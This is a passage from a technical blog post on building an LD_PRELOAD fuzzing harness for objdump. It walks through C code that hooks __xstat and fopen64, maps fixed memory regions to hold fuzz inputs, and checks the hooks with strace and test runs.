    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>    
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this, we get the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file
</code></pre></div></div>

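<p>This is cool, this means that the objdump devs did something right. At this point our global <code class="language-plaintext highlighter-rouge">stat struct</code> is still zeroed out because nothing has populated it yet, so the hook hands back a struct with no file type and a size of zero. objdump’s check on the <code class="language-plaintext highlighter-rouge">stat()</code> result says: “Hey, this doesn’t look like a normal file, something weird is going on”, spits out this error message, and exits. Good job devs!</p>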

<p>So we have identified a problem: we need to <strong>simulate</strong> the fuzzer placing a real input into memory. To do that, I’m going to start using <code class="language-plaintext highlighter-rouge">#ifdef</code> to control whether or not we’re testing our shared object. Basically, if we compile the shared object with <code class="language-plaintext highlighter-rouge">TEST</code> defined, it will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing, and we can see if our harness is working appropriately. So with <code class="language-plaintext highlighter-rouge">TEST</code> defined, we will copy the bytes of <code class="language-plaintext highlighter-rouge">/bin/ed</code> into our input buffer and update the size member of our global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> to match.</p>

<p>You can compile the shared object now to perform the test as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
</code></pre></div></div>

<p>We also need to set up our global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code>; the code to do that should look as follows. Remember, we pass a fake <code class="language-plaintext highlighter-rouge">__ver</code> value to let the <code class="language-plaintext highlighter-rouge">__xstat()</code> hook know that it’s us in the <code class="language-plaintext highlighter-rouge">constructor</code> routine, which allows the hook to behave well and give us the <code class="language-plaintext highlighter-rouge">stat struct</code> we need:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create a global stat struct for our file in case someone asks, this way</span>
    <span class="c1">// when someone calls stat() or fstat() on our target, we can just return the</span>
    <span class="c1">// slightly altered (new size) stat struct and skip the kernel, save syscalls</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Error creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>All in all, our entire harness looks like this now:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET     "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// For testing purposes, we read /bin/ed into our input buffer to simulate</span>
<span class="c1">// what the fuzzer would do</span>
<span class="cp">#define  TEST_FILE      "/bin/ed"
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Error creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Used for testing, load /bin/ed into the input buffer and update its size info</span>
<span class="cp">#ifdef TEST
</span><span class="k">static</span> <span class="kt">void</span> <span class="nf">_test_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>    
    <span class="c1">// Open TEST_FILE for reading</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">TEST_FILE</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to open '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to read max input buf size</span>
    <span class="kt">ssize_t</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
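    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">bytes</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to read '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>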

    <span class="c1">// Update the input size</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">bytes</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>

    <span class="c1">// Setup global "legit" stat struct</span>
    <span class="n">_setup_stat_struct</span><span class="p">();</span>

    <span class="c1">// If we're testing, load /bin/ed up into our input buffer and update size</span>
<span class="cp">#ifdef TEST
</span>    <span class="n">_test_func</span><span class="p">();</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this under <code class="language-plaintext highlighter-rouge">strace</code>, we notice that our two <code class="language-plaintext highlighter-rouge">stat()</code> calls are conspicuously missing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
</code></pre></div></div>

<p>We no longer see the <code class="language-plaintext highlighter-rouge">stat()</code> calls before the <code class="language-plaintext highlighter-rouge">openat()</code> and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the <code class="language-plaintext highlighter-rouge">openat()</code> and make sure we don’t actually interact with our input file, but instead trick objdump into interacting with our input in memory.</p>

<h2 id="finding-a-way-to-hook-openat">Finding a Way to Hook <code class="language-plaintext highlighter-rouge">openat()</code></h2>
<p>My non-expert intuition tells me there are probably a few ways in which a libc function could end up calling <code class="language-plaintext highlighter-rouge">openat()</code> under the hood. Those ways might include the wrappers <code class="language-plaintext highlighter-rouge">open()</code> as well as <code class="language-plaintext highlighter-rouge">fopen()</code>. We also need to be mindful of their <code class="language-plaintext highlighter-rouge">64</code> variants (<code class="language-plaintext highlighter-rouge">open64()</code>, <code class="language-plaintext highlighter-rouge">fopen64()</code>). I decided to try the <code class="language-plaintext highlighter-rouge">fopen()</code> hooks first:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real fopen and its friend fopen64 </span>
<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen_t</span> <span class="n">real_fopen</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen64_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen64_t</span> <span class="n">real_fopen64</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Exploratory hooks to see if we're using fopen() related functions to open</span>
<span class="c1">// our input file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen64() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If we compile and run our exploratory hooks, we get the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'
</code></pre></div></div>

<p>Bingo, dino DNA.</p>

<p>So now we can flesh that hooked function out a bit to behave how we want.</p>

<h2 id="refining-an-fopen64-hook">Refining an <code class="language-plaintext highlighter-rouge">fopen64()</code> Hook</h2>
